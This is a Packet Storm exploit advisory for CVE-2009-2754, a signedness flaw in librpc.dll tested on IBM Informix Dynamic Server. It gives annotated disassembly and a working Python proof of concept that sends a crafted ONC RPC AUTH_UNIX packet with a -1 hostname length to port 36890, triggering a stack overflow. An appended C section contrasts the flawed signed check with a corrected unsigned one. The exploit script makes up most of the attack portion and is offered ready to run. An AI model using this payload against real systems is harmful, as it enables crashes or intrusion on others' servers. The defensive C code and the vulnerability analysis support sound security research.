
librpc.dll Signedness Error Remote Code Execution

Date: 09 Apr 2010 00:00:00
Reported by: ZSploit.com
Type: packetstorm
Source: packetstormsecurity.com

Multiple Vendor librpc.dll Signedness Error Remote Code Execution Vulnerability

```python
# Exploit Title: ZDI-10-023: Multiple Vendor librpc.dll Signedness Error Remote Code Execution Vulnerability
# Date: 2010-04-08
# Author: ZSploit.com
# Software Link: N/A
# Version: N/A
# Tested on: IBM Informix Dynamic Server 10.0
# CVE : CVE-2009-2754

#! /usr/bin/env python
###############################################################################
## File : zs_ids_rpc.py
## Description:
## :
## Created_On : Mar 21 2010
##
## (c) Copyright 2010, ZSploit.com. all rights reserved.
###############################################################################
"""
The issue in __lgto_svcauth_unix():

.text:1000B8E1 mov [ebp+0], eax
.text:1000B8E4 mov eax, [ebx]
.text:1000B8E6 push eax ; netlong
.text:1000B8E7 add ebx, 4
.text:1000B8EA call esi ; ntohl ; Get length of hostname
.text:1000B8EC cmp eax, 0FFh ; Signedness error, if we give 0xffffffff(-1) will pass this check
.text:1000B8F1 jle short loc_1000B8FD
.text:1000B8F3 mov esi, 1
.text:1000B8F8 jmp loc_1000B9D5
.text:1000B8FD ; ---------------------------------------------------------------------------
.text:1000B8FD
.text:1000B8FD loc_1000B8FD: ; CODE XREF: __lgto_svcauth_unix+71j
.text:1000B8FD mov edi, [ebp+4]
.text:1000B900 mov ecx, eax
.text:1000B902 mov edx, ecx
.text:1000B904 mov esi, ebx
.text:1000B906 shr ecx, 2
.text:1000B909 rep movsd ; call memcpy here with user-supplied size cause a stack overflow
.text:1000B90B mov ecx, edx
.text:1000B90D add eax, 3
.text:1000B910 and ecx, 3
.text:1000B913 rep movsb
"""

import sys
import socket

if (len(sys.argv) != 2):
    print "Usage:\t%s [target]" % sys.argv[0]
    sys.exit(0)


# ONC RPC CALL message carrying an AUTH_UNIX credential whose machine-name
# length field is 0xffffffff, the value that passes the signed "cmp eax, 0FFh".
data = ("\x80\x00\x00\x74\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x02"  # record marker (last fragment, 0x74 bytes), xid, msg_type CALL, rpcvers 2
        "\x00\x01\x86\xb1\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01"  # prog, vers, proc, cred flavor 1 = AUTH_UNIX
        "\x00\x00\x00\x4c\x00\x00\xd6\x45\xff\xff\xff\xff\x41\x41\x41\x41"  # cred length 0x4c, stamp, hostname length 0xffffffff (-1)
        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x00\x00\x00\x00"
        "\x00\x00\x00\x00\x00\x00\x00\x0a\x42\x42\x42\x42\x42\x42\x42\x42"
        "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42"
        "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42"
        "\x00\x00\x00\x00\x00\x00\x00\x00")  # AUTH_NULL verifier (flavor 0, length 0)

host = sys.argv[1]
port = 36890

print "PoC for ZDI-10-023 by ZSploit.com"
try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        s.connect((host, port))
        s.send(data)
        print "Sending payload .."
    except:
        print "Error in send"
    print "Done"
except:
    print "Error in socket"
```

The ZSploit Team
http://zsploit.com
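As an added example (not code from the advisory or from librpc.dll), the following C models the hostname-length check exactly as the disassembly performs it (a signed compare against 0FFh) beside the unsigned compare that rejects a length of 0xffffffff, inside a hypothetical AUTH_UNIX credential parser that also bounds the length by the bytes actually received. The field offsets (4-byte stamp followed by a 4-byte big-endian machine-name length) follow the ONC RPC AUTH_UNIX layout and are an assumption, as is the 256-byte destination buffer.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>

#define MAX_MACHINENAME 0xFF   /* the 0FFh constant in the disassembly */

/* Big-endian 32-bit read; stands in for the ntohl() call in the disassembly. */
static uint32_t be32(const uint8_t *p) {
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) |
           ((uint32_t)p[2] << 8) | (uint32_t)p[3];
}

/* The check as librpc.dll does it: the length is treated as signed and
 * compared with "cmp eax, 0FFh / jle", so 0xffffffff (-1) is accepted
 * and then used as the memcpy size. Returns 1 if the copy would proceed. */
int vulnerable_length_ok(uint32_t len) {
    return (int32_t)len <= MAX_MACHINENAME;
}

/* Corrected check: compare as unsigned, so every value above 255 is
 * rejected, including 0xffffffff. */
int hardened_length_ok(uint32_t len) {
    return len <= (uint32_t)MAX_MACHINENAME;
}

/* Hypothetical parser for an AUTH_UNIX credential body (stamp, machine-name
 * length, name bytes) into a fixed 256-byte buffer. Returns the name length,
 * or -1 when the declared length exceeds the limit or the bytes present. */
int parse_machinename(const uint8_t *cred, size_t cred_len, char out[256]) {
    if (cred_len < 8) return -1;              /* stamp + length must be present */
    uint32_t len = be32(cred + 4);
    if (!hardened_length_ok(len)) return -1;  /* rejects the -1 length */
    if (len > cred_len - 8) return -1;        /* declared length vs. wire bytes */
    memcpy(out, cred + 8, len);               /* now at most 255 bytes */
    out[len] = '\0';
    return (int)len;
}
```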
